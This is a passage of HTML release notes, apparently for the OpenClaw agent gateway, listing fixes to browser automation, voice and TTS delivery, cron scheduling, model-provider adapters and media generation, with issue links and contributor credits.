<li>Live tests/voice: accept common STT variants for OpenClaw and ElevenLabs brand names so provider smoke tests fail on real regressions rather than equivalent transcripts.</li>
<li>Agents/replies: forward sanitized underlying agent failure details on external channels instead of replacing unknown failures with a generic retry message.</li>
<li>CLI/MCP: translate OpenClaw <code>mcp.servers.*.transport</code> entries into Claude/Gemini CLI <code>type</code> fields so streamable HTTP MCP servers load in CLI backend sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329018159" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71724/hovercard" href="https://github.com/openclaw/openclaw/pull/71724">#71724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blockchain-Oracle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blockchain-Oracle">@Blockchain-Oracle</a>.</li>
<li>Browser/CDP: honor configured remote and <code>attachOnly</code> CDP HTTP/WebSocket timeouts when opening tabs through raw CDP or <code>/json/new</code> fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132440350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54238/hovercard" href="https://github.com/openclaw/openclaw/pull/54238">#54238</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuncWei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuncWei">@FuncWei</a>.</li>
<li>WhatsApp/TTS: send visible text separately from PTT voice-note audio instead of relying on hidden voice-note captions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108175128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51081/hovercard" href="https://github.com/openclaw/openclaw/issues/51081">#51081</a>.</li>
<li>Browser/client: avoid telling agents to restart OpenClaw for dispatcher timeouts on external browser profiles such as <code>attachOnly</code>, remote CDP, and existing-session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044411472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40815/hovercard" href="https://github.com/openclaw/openclaw/pull/40815">#40815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsline/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsline">@0xsline</a>.</li>
<li>Agents/TTS: preserve <code>[[audio_as_voice]]</code> directives on trusted text tool-result <code>MEDIA:</code> payloads so generated audio still delivers as a voice note. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076576982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46535" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46535/hovercard" href="https://github.com/openclaw/openclaw/pull/46535">#46535</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/azade-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/azade-c">@azade-c</a>.</li>
<li>Agents/TTS: keep queued tool media when an assistant ends with <code>NO_REPLY</code> on non-block delivery paths, so media-only generated audio replies still send. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198016737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60025" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60025/hovercard" href="https://github.com/openclaw/openclaw/pull/60025">#60025</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradlind1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradlind1">@bradlind1</a>.</li>
<li>Telegram/STT: frame inbound voice-note transcripts as machine-generated, untrusted text in agent context while preserving raw transcript mention detection. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4018090172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33360/hovercard" href="https://github.com/openclaw/openclaw/issues/33360">#33360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smartchainark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smartchainark">@smartchainark</a>.</li>
<li>Subagents/browser: show an actionable <code>/tools</code> notice when browser automation is configured but filtered out by the active tool profile, and document that coding-profile agents should use <code>tools.alsoAllow: ["browser"]</code> rather than subagent allowlists alone.</li>
<li>Control UI/Quick Settings: persist the assistant avatar override to browser local storage (mirroring the user avatar) so uploaded image data URLs no longer fail config validation with "Too big: expected string to have &lt;=200 characters". Also lift the gateway-side <code>ui.assistant.avatar</code> length cap to match the user avatar size budget for non-UI clients writing the field directly. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Plugin SDK: share diagnostic event subscriptions across duplicate source/dist module graphs so legacy root SDK imports still receive runtime diagnostic events.</li>
<li>Agents/Bedrock: prevent empty assistant stream-error turns from poisoning Converse replay by persisting, repairing, and replaying a non-empty fallback block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328056829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71572" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71572/hovercard" href="https://github.com/openclaw/openclaw/issues/71572">#71572</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328448230" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71627/hovercard" href="https://github.com/openclaw/openclaw/pull/71627">#71627</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Agents/Anthropic/Bedrock: strip thinking blocks with missing, empty, or blank replay signatures before provider conversion, falling back to non-empty omitted-reasoning text when needed so corrupted signed-thinking history no longer poisons subsequent turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070310932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45010/hovercard" href="https://github.com/openclaw/openclaw/issues/45010">#45010</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307495974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70054" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70054/hovercard" href="https://github.com/openclaw/openclaw/pull/70054">#70054</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/castaples/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/castaples">@castaples</a>.</li>
<li>Agents/Anthropic/Bedrock: preserve stripped thinking-only assistant replay turns with non-empty omitted-reasoning text so provider adapters keep strict user/assistant turn shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wujiaming88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wujiaming88">@wujiaming88</a>.</li>
<li>ACP/Codex: pass <code>sessions_spawn(runtime="acp")</code> model and thinking overrides into Codex ACP startup, normalize <code>openai-codex/*</code> refs and slash reasoning suffixes, and recognize managed Codex ACP wrapper commands without blocking current <code>gpt-5.5</code> sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042597081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40393" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40393/hovercard" href="https://github.com/openclaw/openclaw/issues/40393">#40393</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328579948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71643" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71643/hovercard" href="https://github.com/openclaw/openclaw/pull/71643">#71643</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/91wan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/91wan">@91wan</a>.</li>
<li>Browser/CDP: make readiness diagnostics use the same discovery-first fallback as reachability for bare <code>ws://</code> Browserless and Browserbase CDP URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299797320" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69532/hovercard" href="https://github.com/openclaw/openclaw/issues/69532">#69532</a>.</li>
<li>Browser/CDP: explain that loopback Browserless or other externally managed CDP services need <code>attachOnly: true</code> and matching Browserless <code>EXTERNAL</code> endpoint when reporting local port ownership conflicts, and fall back to the configured bare WebSocket root when a discovered Browserless endpoint rejects CDP. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095070385" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49815/hovercard" href="https://github.com/openclaw/openclaw/issues/49815">#49815</a>.</li>
<li>Gateway/reload: preserve indefinite <code>gateway.reload.deferralTimeoutMs: 0</code> semantics for channel hot reload deferrals so active agent runs are not interrupted by a forced channel restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>Agents/tool results: cap persisted Pi tool-result details and strip hidden diagnostics before provider conversion, preventing large debug payloads from bloating session transcripts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>ACP/OpenCode: update the bundled acpx runtime to 0.6.0 and cover the OpenCode ACP bind path in Docker live tests.</li>
<li>Providers/OpenCode Go: add DeepSeek V4 Pro and DeepSeek V4 Flash to the Go catalog while the bundled Pi registry catches up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328161792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71587/hovercard" href="https://github.com/openclaw/openclaw/issues/71587">#71587</a>.</li>
<li>Providers/OpenCode Go: route DeepSeek V4 Pro/Flash through the OpenAI-compatible Go endpoint and suppress invalid <code>reasoning_effort: "off"</code> payloads, fixing tool-enabled requests for <code>opencode-go/deepseek-v4-flash</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328769808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71683/hovercard" href="https://github.com/openclaw/openclaw/issues/71683">#71683</a>.</li>
<li>Plugins/model defaults: run Skill Workshop review, Active Memory recall, and session-memory slug generation on the configured agent default model instead of the hardcoded OpenAI SDK fallback when hook context lacks model metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328679241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71659" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71659/hovercard" href="https://github.com/openclaw/openclaw/issues/71659">#71659</a>.</li>
<li>Providers/Venice: fill the required DeepSeek V4 <code>reasoning_content</code> placeholder for <code>venice/deepseek-v4-pro</code> and <code>venice/deepseek-v4-flash</code> replay turns without sending native DeepSeek <code>thinking</code> controls that Venice rejects. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328450187" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71628/hovercard" href="https://github.com/openclaw/openclaw/issues/71628">#71628</a>.</li>
<li>Browser/existing-session: support per-profile Chrome MCP command/args, map <code>cdpUrl</code> to <code>--browserUrl</code> or <code>--wsEndpoint</code>, and avoid combining endpoint flags with <code>--userDataDir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080120284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47879/hovercard" href="https://github.com/openclaw/openclaw/issues/47879">#47879</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080995803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48037" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48037/hovercard" href="https://github.com/openclaw/openclaw/issues/48037">#48037</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4220547110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62706" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62706/hovercard" href="https://github.com/openclaw/openclaw/issues/62706">#62706</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/puneet1409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/puneet1409">@puneet1409</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhehao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhehao">@zhehao</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madkow1001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madkow1001">@madkow1001</a>.</li>
<li>Media/plugins: bound MIME sniffing and ZIP archive preflight before handing untrusted files to <code>file-type</code> or <code>jszip</code>, reducing parser CPU and memory exposure for attachments and ClawHub plugin archives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory-host SDK: use trusted env-proxy mode for remote embedding and batch HTTP calls only when Undici will proxy that target, preserving SSRF DNS pinning for <code>ALL_PROXY</code>-only and <code>NO_PROXY</code> bypass cases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115438877" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52162/hovercard" href="https://github.com/openclaw/openclaw/issues/52162">#52162</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327688904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71506/hovercard" href="https://github.com/openclaw/openclaw/pull/71506">#71506</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DhtIsCoding/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DhtIsCoding">@DhtIsCoding</a>.</li>
<li>Gateway/dashboard: render Control UI and WebSocket links with <code>https://</code>/<code>wss://</code> when <code>gateway.tls.enabled=true</code>, including <code>openclaw gateway status</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327630185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71494" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71494/hovercard" href="https://github.com/openclaw/openclaw/issues/71494">#71494</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327660439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71499/hovercard" href="https://github.com/openclaw/openclaw/pull/71499">#71499</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepkilo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepkilo">@deepkilo</a>.</li>
<li>Agents/OpenAI-compatible: default proxy/local completions tool requests to <code>tool_choice: "auto"</code> when tools are present, so providers enter native tool-calling mode instead of replying with plain-text tool directives. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327534098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71472/hovercard" href="https://github.com/openclaw/openclaw/pull/71472">#71472</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Speed-maker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Speed-maker">@Speed-maker</a>.</li>
<li>OpenAI image generation: use <code>gpt-5.5</code> for the Codex OAuth responses transport instead of the retired <code>gpt-5.4</code> model, fixing 500s from ChatGPT Codex image generation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327703791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71513/hovercard" href="https://github.com/openclaw/openclaw/issues/71513">#71513</a>. Thanks @baolongl.</li>
<li>OpenAI image generation: route transparent-background default-model requests to <code>gpt-image-1.5</code>, document the expected <code>image_generate</code> call shape, and keep Azure/custom OpenAI-compatible deployment names untouched.</li>
<li>Google video generation: download direct MLDev Veo <code>video.uri</code> results instead of passing them through the Files API path, fixing 404s after successful generation/polling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324817492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71200" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71200/hovercard" href="https://github.com/openclaw/openclaw/issues/71200">#71200</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/panhaishan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/panhaishan">@panhaishan</a>.</li>
<li>Google video generation: fall back to the REST <code>predictLongRunning</code> Veo endpoint for text-only SDK 404s while keeping reference image/video generation on the SDK path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215587624" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62309/hovercard" href="https://github.com/openclaw/openclaw/issues/62309">#62309</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222914272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63008" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63008/hovercard" href="https://github.com/openclaw/openclaw/issues/63008">#63008</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216005545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62343" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62343/hovercard" href="https://github.com/openclaw/openclaw/pull/62343">#62343</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leoleedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leoleedev">@leoleedev</a>.</li>
<li>MiniMax music generation: switch the bundled default model from the unsupported <code>music-2.5+</code> id to the current <code>music-2.6</code> API model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245010440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64870/hovercard" href="https://github.com/openclaw/openclaw/issues/64870">#64870</a> and addresses the music default from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215652478" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62315/hovercard" href="https://github.com/openclaw/openclaw/issues/62315">#62315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/noahclanman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/noahclanman">@noahclanman</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edwardzheng1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edwardzheng1">@edwardzheng1</a>.</li>
<li>Cron: record jobs interrupted by a gateway restart as failed at their original <code>runningAtMs</code>, skip unsafe startup replay, and disable interrupted one-shot jobs so they show a visible failure instead of silently disappearing or duplicating work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187207893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59056" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59056/hovercard" href="https://github.com/openclaw/openclaw/issues/59056">#59056</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207476732" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61343/hovercard" href="https://github.com/openclaw/openclaw/issues/61343">#61343</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231039858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63657/hovercard" href="https://github.com/openclaw/openclaw/issues/63657">#63657</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190617901" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59301" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59301/hovercard" href="https://github.com/openclaw/openclaw/issues/59301">#59301</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ponchoooPenguin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ponchoooPenguin">@ponchoooPenguin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daemic24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daemic24">@daemic24</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myradon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myradon">@myradon</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hikiwibot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hikiwibot">@hikiwibot</a>.</li>
<li>Cron tool: recover flat top-level schedule shorthand such as <code>cron</code>, <code>tz</code>, and <code>staggerMs</code> before gateway validation, so model-generated cron add/update calls preserve cron jitter settings. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyxben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyxben">@tyxben</a>.</li>
<li>Cron: hydrate flat legacy job rows with top-level <code>cron</code>, <code>tz</code>, <code>session</code>, and <code>message</code> fields into canonical schedule, target, and payload objects before startup recomputes run times. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059364525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43351/hovercard" href="https://github.com/openclaw/openclaw/issues/43351">#43351</a>.</li>
<li>Agents/replies: let pending group chat history trigger bare mentioned turns without treating metadata-only inbound context as user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327616390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71489" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71489/hovercard" href="https://github.com/openclaw/openclaw/issues/71489">#71489</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327739393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71520" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71520/hovercard" href="https://github.com/openclaw/openclaw/pull/71520">#71520</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Google media generation: strip a configured trailing <code>/v1beta</code> from Google music/video provider base URLs before calling the Google GenAI SDK, preventing doubled <code>/v1beta/v1beta</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226005033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63240" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63240/hovercard" href="https://github.com/openclaw/openclaw/issues/63240">#63240</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226196460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63258/hovercard" href="https://github.com/openclaw/openclaw/pull/63258">#63258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hybirdss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hybirdss">@Hybirdss</a>.</li>
<li>Discord: restore direct-message voice-note preflight transcription and classify URL-only Ogg/Opus voice attachments as audio while skipping partial attachments without usable URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207287932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61314" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61314/hovercard" href="https://github.com/openclaw/openclaw/issues/61314">#61314</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244552483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64803/hovercard" href="https://github.com/openclaw/openclaw/issues/64803">#64803</a>.</li>
<li>Plugins/build: copy bundled plugin skill trees into <code>dist-runtime</code>, broaden Windows symlink-copy fallbacks, and fingerprint runtime dependencies from <code>lstat</code> so symlink-like directory entries cannot crash staging.</li>
<li>Google Chat: preserve reply text when a typing indicator message is deleted or can no longer be updated, so media captions and first text chunks are resent instead of silently disappearing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327650702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71498" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71498/hovercard" href="https://github.com/openclaw/openclaw/pull/71498">#71498</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colin-lgtm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colin-lgtm">@colin-lgtm</a>.</li>
<li>Cron: tolerate malformed legacy job rows in startup, main-session system-event payloads, and human-readable <code>cron list</code> output so missing <code>state</code>, <code>payload.text</code>, or display fields no longer crash the scheduler or CLI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256052544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66016/hovercard" href="https://github.com/openclaw/openclaw/issues/66016">#66016</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254208406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65916/hovercard" href="https://github.com/openclaw/openclaw/issues/65916">#65916</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237081136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64137/hovercard" href="https://github.com/openclaw/openclaw/issues/64137">#64137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173024002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57872" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57872/hovercard" href="https://github.com/openclaw/openclaw/issues/57872">#57872</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197639692" 